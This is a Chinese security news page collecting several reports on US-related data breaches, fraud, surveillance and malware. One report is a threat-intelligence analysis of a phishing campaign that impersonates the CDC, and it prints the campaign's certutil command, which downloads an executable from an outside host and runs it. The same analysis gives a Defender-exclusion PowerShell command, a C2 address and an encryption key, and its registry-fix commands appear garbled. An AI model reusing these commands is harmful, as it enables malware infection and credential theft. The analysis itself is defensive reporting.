标签: 美国

美特勤局证实有海外黑客团队骗取失业救助金 已损失数亿美元

新冠疫情期间,美国各州发放了失业救助金。不过根据美国特勤局(U.S. Secret Service)最新发布的警告,有海外诈骗团伙利用此前窃取的身份资料申请救助金,导致数百万美元的资金外流。 援引《纽约时报》本周六报道,美国特勤局认为有一伙来自尼日利亚的犯罪分子利用此前从网络攻击中窃取的个人信息,可能窃取了最高数亿美元的救济资金。 根据纽约时报披露的一份特勤局备忘录,该诈骗团伙的主要目标是华盛顿州的失业办公室,但也攻击了佛罗里达州、马萨诸塞州、北卡罗来纳州、俄克拉荷马州、罗得岛和怀俄明州。 美国特勤局本周六证实,确认存在针对多州失业保险计划资金的犯罪行为,但没有就细节发表评论。该机构表示,这些盗窃案通常涉及骗子利用身份盗窃来提交虚假的失业保险金,然后利用社会工程来清洗由此产生的钱,这样犯罪分子就无法被追踪到。 美国特勤局在一份声明中写道:“特勤局的主要调查重点是减轻犯罪分子针对公民身份盗窃和网络犯罪的所有企图,而这次与COVID-19有关。”   (稿源:cnBeta,封面源自网络。)

纽约支付初创公司不安全的数据库暴露数百万张信用卡信息

据外媒TechCrunch报道,一个存储着数百万张信用卡交易信息的庞大数据库,在公开暴露在互联网上近三周后,已经被保护起来。该数据库属于Paay公司,这是一家位于纽约的信用卡支付处理商。与其他支付处理商一样,该公司代表销售商户(如网店和其他企业)验证支付,以防止欺诈性交易。 但由于服务器上没有密码,任何人都可以访问里面的数据。 安全研究人员Anurag Sen发现了这个数据库。他告诉TechCrunch,他估计数据库中大约有250万条银行卡交易记录。在TechCrunch代表他联系了该公司后,数据库被下线。”4月3日,我们在一个服务上调出了一个新的实例,目前我们正在废止这个服务。”Paay联合创始人Yitz Mendlowitz说。”发生了一个错误,导致该数据库在没有密码的情况下被曝光。” 该数据库中包含了一些商户的每日刷卡记录,时间可追溯至2019年9月1日。TechCrunch查看了部分数据。每笔交易都包含了完整的明文信用卡号码、到期日和消费金额。这些记录还包含了每个信用卡号码的部分掩盖副本。这些数据不包括持卡人的姓名或卡片验证值,这使得信用卡更难被用来进行诈骗。 Mendlowitz 对这一调查结果提出了质疑。”我们不存储卡号,因为我们没有用处。” TechCrunch向他发送了部分显示卡号明文的数据,但他没有回应后续报道。 这是今年以来第三家承认安全漏洞的支付处理商。今年1月,Sen发现另一家支付处理商的数据库遭曝光,其中存储着670万条记录。本月早些时候,另一名研究人员发现两家支付法院罚款和水电费的支付网站也留下了几个月的缓存数据暴露。 Mendlowitz表示,该公司正在通知15到20家商户,并表示该公司已经聘请了一位专家来了解安全漏洞的范围。   (稿源:cnBeta,封面源自网络。)

美 CDC、 世卫组织等机构的近 2.5 万电子邮件地址和密码遭泄露

据外媒报道,在当局处理像COVID-19这种威胁生命的疾病时,最糟糕的事情之一就是安全漏洞。而现在这样的事情已经发生,因为不明身份人士公布了近25000个电子邮件地址和密码,这些电子邮件地址和密码来自不同的组织,包括美国疾病控制与预防中心(CDC)、盖茨基金会、美国国立卫生研究院(NIH)、世界卫生组织(WHO)和世界银行。 目前还不清楚这些机构遭黑客入侵的时间,也不清楚谁对入侵事件和信息的传播负责,但结果还是令人担忧。其中一些密码仍然可以被用来访问电子邮件地址。监视网上极端主义和恐怖组织的SITE情报组告诉《华盛顿邮报》,这些电子邮件的登录信息在周日被共享。到了周一,这些邮件已经被极右极端分子用来进行黑客攻击和骚扰。 “新纳粹分子和白人至上主义者利用这些名单,在他们的活动场所中积极发布这些名单,”SITE的执行董事Rita Katz说。”极右极端分子利用这些数据,在分享新冠病毒大流行的阴谋论的同时,还呼吁开展骚扰运动。这些所谓的电子邮件凭证的分发只是整个极右分子长达数月的行动的另一个部分,目的是将COVID-19大流行病武器化。” 这些信息最初出现在4chan上,然后被转移到Pastebin上,然后又出现在Twitter和Telegram上的极右极端主义账户上。最大的一批电子邮件地址属于NIH(9938个),其次是CDC(6857个)、世界银行(5120个)和WHO(2732个)。 澳大利亚网络安全专家Robert Potter 表示,一些WHO的电子邮件地址和密码组合是真实的。”他们的密码安全性令人震惊,”Potter 说,关于泄露的WHO凭证,他说。”有48人用’密码’作为他们的密码。其他人用的是自己的名字或 ‘changeme’。”Potter表示,世卫组织的信息来自于2016年的一次黑客攻击。目前还不清楚其他凭证的来源,也不清楚是谁能够获得这些凭证。其中一些可能是从暗网购买的。 新纳粹组织一直在利用这些信息传播和助长COVID-19的阴谋论。有一个团体说,这些邮件地址的数据 “证实了SARS-COV-2实际上是人工合成的病毒”,这也是目前流传的新冠病毒阴谋论之一。世卫组织最近表示,这种新型冠状病毒是动物源性的,没有任何迹象表明COVID-19病毒是在实验室里合成的。   (稿源:cnBeta,封面源自网络。)

疫情期间美国 IC3 网络犯罪报告量激增 每天接到 3000-4000 起

自新冠病毒疫情在美国蔓延以来,联邦调查局的网络犯罪投诉中心(IC3)接到的网络犯罪举报量激增,主要是因为美国国内和国际黑客试图在这个时间段进行各种网络攻击活动。 美国联邦调查局网络部副助理主任托尼娅·乌戈雷茨(Tonya Ugoretz)周四表示,IC3每天收到3000-4000起网络安全投诉,而在疫情爆发之前每天收到的投诉量维持在1000起左右。 本周四由Aspen Institute主办的网络研讨会上,乌戈雷茨表示:“我们的网络漏洞越来越多,也增加了威胁者利用这些漏洞的兴趣。” 乌戈雷茨表示许多黑客来自于那些“渴望深入了解”新冠肺炎相关研究的国家,而“远程工作的快速转变”已经为黑客提供了大量供他们利用的网络漏洞。 乌戈雷茨提到:“各国对有关病毒的信息非常感兴趣,例如关于疫苗的信息。我们的确发现有侦察活动,一些攻入那些机构的行为,尤其是那些公开表示自己在研究新冠肺炎的机构。” 乌戈雷茨称,研究潜在疗法或疫苗的机构公开宣传自己在做这件事情是合情合理的。但是她指出,“不好的一面是,这会让他们成为其他有兴趣搜集研究细节的国家的目标,这些国家甚至可能会窃取这些机构的知识产权信息。”她表示,FBI发现,这些由国家支持的黑客组织也试图攻入美国医疗保健系统。   (稿源:cnBeta,封面源自网络。)

美参议员就新冠病毒网站的数据隐私问题向 Verily 施压

据外媒报道,当地时间周二,一群美国民主党参议员对谷歌母公司Alphabet旗下的生命科学部门Verily进行了盘问”,内容是关于该公司的新冠筛查网站相关的隐私问题。据悉,该网站于两周前上线,让用户可以通过筛查看看自己是否应该去新冠病病毒检测站检测。 该套工具目前只对加州四个县的人开放,其由Verily的Project Baseline负责。 议员们对该网站是否符合《医疗保险可携性与责任法案(HIPAA)》提出了担忧。HIPAA是监管某些医疗信息的安全和隐私的联邦法律。参议员们还对该网站要求只有拥有谷歌账户才能进行筛查的规定提出了异议,实际上这一举动已经引起了隐私倡导者的密切关注。 参议员们在写给这家公司的CEO Andy Conrad的一封公开信中称:“随着公司在加州推进新冠病毒基准试点项目和测试筛查网站,解决这些关键的隐私问题至关重要。”这封信由新泽西州的Robert Menendez、加州的Kamala Harris、康涅狄格州的Richard Blumenthal、俄亥俄州的Sherrod Brown和新泽西州的Cory Booker联合签署。 对此,Verily并未立即回复记者的置评请求吧,不过这家公司必须要在4月6日之前回复这封信函。   (稿源:cnBeta,封面源自网络。)

黑客网站曝光了超过 490 万乔治亚州居民的详细个人信息

上周六,某黑客论坛公布了包含 493 万 4863 乔治亚州居民的详细个人信息的数据库。在大小为 1.04 GB 的 Microsoft Access 数据库文件中,可查看到包括全名、家庭住址、出生日期、身份证编号、手机号码之类的隐私内容,甚至连已故公民的信息也没放过。 周末的时候,数据泄露监视和预防服务公司 Under The Breach 曝光了本次泄漏事件,并向外媒 ZDNet 分享了一些细节。 由快照可知,数据库包含了超过 490 万条记录,其中包含了数百万已故公民。根据 2019 年的人口普查,该州目前预估人口在 370 万左右。 目前尚不清楚黑客论坛中有多少访客已获取该数据库,数据泄露的源头也仍然是个谜。 在周日的报道中,ZDNet 认为可能源自该州的中央选举委员会(CEC)。然而在周一的一份声明中,该委员会已予以否认,因其通常并不会收集如此详尽的个人信息。 至于黑客论坛,其拒绝在致 ZDNet 的一份声明中透露他们是从何处获得数据的,但已排除了 CEC 的嫌疑。目前当地有关部门正在对此事展开深入的调查。   (稿源:cnBeta,封面源自网络。)

美政府被曝利用移动广告定位数据研究新冠病毒传播

据外媒报道,据知情人士透露,美国疾病控制和预防中心(CDC)已与全美各州和地方政府合作,追踪人们的手机位置数据,借以研究新型冠状病毒的传播趋势。 知情人士表示,移动广告公司(而非手机运营商本身)始终在通过CDC向美国政府机构转发“某些地理上感兴趣的用户”的信息。显然,此举旨在帮助创建全国性的政府门户网站,并将使用多达500个城市的地理位置数据来监控疫情。 官员们辩称,这些信息已经被匿名化和汇总,可以帮助他们针对病毒的传播情况量身定做疫情应对措施,并使用某人驾车行驶里程或去过多少家商店等变量来预估疫情的经济影响。 政府机构的这种监测也可以充当提示,看人们是否遵守CDC保持安全距离的指导方针或官方的“就地避难”命令。例如,研究人员通过地理位置数据发现,尽管接到了警告通知,但仍有大批纽约人在参观布鲁克林展望公园,于是他们联系了警方。 虽然这些数据据称已经被去除了任何可识别的信息,但这仍然引发隐私权活动家的担忧。隐私研究人员沃尔菲·克里斯托(Wolfie Christl)表示,该行业正将其侵入性做法和产品作为共享元数据的借口。 克里斯托称:“由于疫情爆发,在某些情况下利用基于消费者数据的聚合分析可能是合适的,即使数据是由公司秘密或非法收集的。因为位置数据的真正匿名化几乎是不可能的,所以强有力的法律保障至关重要。” 尽管如此,针对这些移动广告商的法规还没有在现有隐私法中给与明确定义,特别是因为手机用户经常选择加入这些公司的跟踪措施,并与政府机构共享不包含任何可识别信息的数据。 不过,电信运营商需要遵守不同的规则,几家运营商指出,美国政府目前还没有向它们索要元数据。这可能是因为官员们正在从其他科技巨头那里寻求同样的信息,据称美国政府正在与Facebook、谷歌和其他科技公司进行“积极谈判”,以获取匿名的聚合数据,监控用户是否遵守了官方的健康法规。 世界各国政府已经开始实施类似的监测,以帮助做出应对疫情反应。据报道,意大利、德国和奥地利的电信公司已经承认与政府机构共享用户的地理位置数据。 上周,欧盟内部市场专员蒂埃里·布雷东(Thierry Breton)向该地区最大的电信公司施压,要求它们共享客户手机上的匿名元数据以跟踪病毒的传播情况,并利用这些信息对医疗用品进行分类。     (稿源:网易科技,封面源自网络。)  

警惕假冒美国 CDC 发送新冠疫情的邮件投递商业木马 Warzone RAT

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心(CDC)作为发件人,投递附带Office公式编辑器漏洞的文档至目标邮箱,收件人在存在Office公式编辑器漏洞(CVE-2017-11882)的电脑上打开文档,就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件,具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能,并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据,该病毒从3月23日开始传播,目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件,建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击,客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知,将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc,引导收件人打开查看。 此时如果用户在没有安全防护软件,且使用没有修复CVE-2017-11882漏洞的Office打开此文档,就会触发漏洞中的恶意代码,然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为: CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写,代码经过高度混淆,运行时经过两次解密在内存中Invoke执行最终的PE文件,该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现,目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能: 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级(包括最新的Win10系统) 远程开启摄像头 盗取浏览器密码(Chrome,Firefox,IE,Edge,Outlook,Thunderbird,Foxmail) 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行,则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中: powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本,使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能,该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址:phantom101.duckdns.org:5200,与该地址建立连接成为受控机,使电脑完全被黑客控制。 与服务器进行TCP通信,传输数据使用RC4加密算法加密,密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下: C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件,对于邮件附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描; 2、安装CVE-2017-11882漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器: reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管,可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统(腾讯御界)对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统,是基于腾讯安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统,该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接:https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统(御点)拦截病毒木马攻击,更多信息参考链接:https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

美国一天然气公司在感染勒索软件后关闭两天

美国国土安全部网络安全和基础设施安全署的公告显示,有一家未公开名字的天然气公司在感染勒索软件后关闭设施两天。感染发生在该公司的天然气压缩设施,攻击始于钓鱼邮件内的恶意链接。 攻击者从其 IT 网络渗透到作业 OT 网络,其 IT 和 OT 网络都被勒索软件感染。感染没有扩散到控制压缩设备的可编程逻辑控制器,因此该公司没有失去对操作设施的控制。工作人员关闭了压缩设施两天,但由于管道传输的依赖性,它的关闭连带影响到了其它地方的压缩设施。   (稿源:solidot,封面源自网络。)

美政府披露所谓朝鲜黑客使用的七款恶意软件

上周五,美国五角大楼、联邦调查局和国土安全部,联合发布了有关朝鲜发起的黑客攻击事件的技术细节。其中谈到了七种恶意软件,涉及网络钓鱼和远程访问,以及所谓的非法活动、窃取资金和逃避制裁。在 @CNMF_VirusAlert 发布的推特帖子中,还附上了有关详情的链接。 链接到 VirusTotal 的帖子,公布了有关散列密码、文件名和其它技术详情,可帮助防御者识别其内部网络威胁。 美国土安全部下设网络安全和基础设施安全局(IEA)的咨询顾问称,行动背后有着 Hidden Cobra 的身影,美方怀疑该黑客组织与朝鲜政府有关。 本次曝光的七款恶意软件,有六个都被上传到了 VirusTotal,包括: Bistromath:功能齐全的远程访问木马和植入程序,可执行系统调查、文件上传和下载、处理和命令执行,以及对麦克风、剪贴板和屏幕的监视。 Slickshoes:一种信标植入手段,可加载但不执行,能够辅助 Bistromath 实现诸多功能。 Hotcroissant:一种功能齐全的信标植入手段,可实现上文列出的诸多相同功能。 Artfulpie:可从硬编码的网址执行 DLL 文件的下载,在内存中加载和执行植入程序。 Buttetline:另一种功能完备的植入手段,使用伪造的 HTTPS 方案和经过修改的 RC4 加密密码来保持隐身状态。 Crowdedflounder:一个 Windows 可执行文件,旨在将远程访问木马解压到计算机内存中并执行。 Cyberscoop 指出:上周五的行动,标志着美国网络司令部首次认定了朝方的黑客行动。促成这一点的其中一个原因,是攻击的复杂性已变得越来越高。 包括路透社在内的多家新闻机构,均援引过去年八月的联合国报告,预估朝方黑客针对金融机构和加密货币交易攻击的获利高达 20 亿美元。   (稿源:cnBeta,封面源自网络。)